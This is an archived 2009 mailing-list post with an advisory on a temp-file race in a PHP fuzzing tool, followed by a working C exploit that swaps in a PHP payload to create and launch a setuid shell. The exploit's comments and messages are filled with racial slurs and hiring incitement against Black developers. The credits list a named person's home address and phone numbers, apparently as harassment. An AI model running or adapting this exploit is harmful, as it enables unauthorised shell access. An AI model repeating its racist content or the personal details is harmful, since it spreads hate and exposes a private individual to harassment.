[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability



PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability
I. BACKGROUND

PFF is a popular fuzzing suite developed by a team of highly
skilled developers at a classified government funded information 
security research center.
http://www.setec.org/~calcite/code/pff/

II. DESCRIPTION

Local exploitation of an insecure file creation method allows an
attacker to execute arbritrary code with the privileges of the user 
running the affected application.

III. ANALYSIS

PFF uses a default location for output files before execution by
the php intepreter.
This location can be owned by another user. An attacker can then
use the time between creation of the output file and execution of 
the file by the php binary to replace the file with a one 
containing the attacker's payload.

IV. DETECTION

All versions are affected.

V. WORKAROUND

Use a location not writable by another user for storage of PFF
output files.

VI. VENDOR RESPONSE

Vendor was uninterested in fixing the issue.


VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has not yet
assigned an identifier  to this issue.

VIII. DISCLOSURE TIMELINE

07/30/2009 10:01PM EST - Initial Contact
07/30/2009 10:05PM EST - Initial Vendor Reply
07/30/2009 10:06PM EST - Vendor expressed lack of interest in
fixing the issue.

IX. CREDIT

This vulnerability was discovered by abad1dea,
Melissa Elliott
Email:
Elliott_mb@xxxxxxxxxxxxxxxxxxxxxx
melissa@xxxxxxxxxx
Address:
408 Homestead Drive
Forest, VA 24551

Box 2073
Lynchburg Edu

Phone:
(434) 610-3058
      544-8967

Web:
http://www.0xabad1dea.net

IRC:
irc.smashthestack.org/#social/esper
---
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/
/*
 * cheddabay.c - Insecure File creation method in pff. Yields shell
 * with priveleges of user executing pff. 
 *
 * Important note before reading on: the primary developer of this utility
 * is a darkie. It is time we make a decision on whether or not to allow
 * niggers to fuck up the last white industry left in the world. 
 * DONT HIRE NIGGERS, THEY BRING ONLY FAILURE.
 *
 * Shouts to irc.smashthestack.org/#social.
 *
 *
 * Last note:
 * Special thanks to Ilja Van Sprundel from SureSEC... LOVE U BABE!
 * Hope we can install linux again soon!
 * <3 <3 <3 <3 <3
 */

#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)


/*
 * STOP HIRING BLACK DEVELOPERS!
 * THE SOUTH WILL RISE AGAIN.
 */

int main(int argc, char *argv[])
{
    int f,n,w;
    char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
    struct inotify_event e;
    n = inotify_init();
    printf("-= nigger chaser initialized =-\n");
    if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
        write(f, s, strlen(s));
        close(f);
    }
    printf("[+] created abritrary code: %s\n",  FILEB);
    w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
    read(n, &e, sizeof(e));
    rename(FILEB, FILEA);
    printf("[+] %s => %s\n", FILEB, FILEA);
        printf("[+] executing arbitrary code\n");
    sleep(2);
    printf("[+] racism complete \n");
    execl("/tmp/sh", "/tmp/sh", 0);

}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/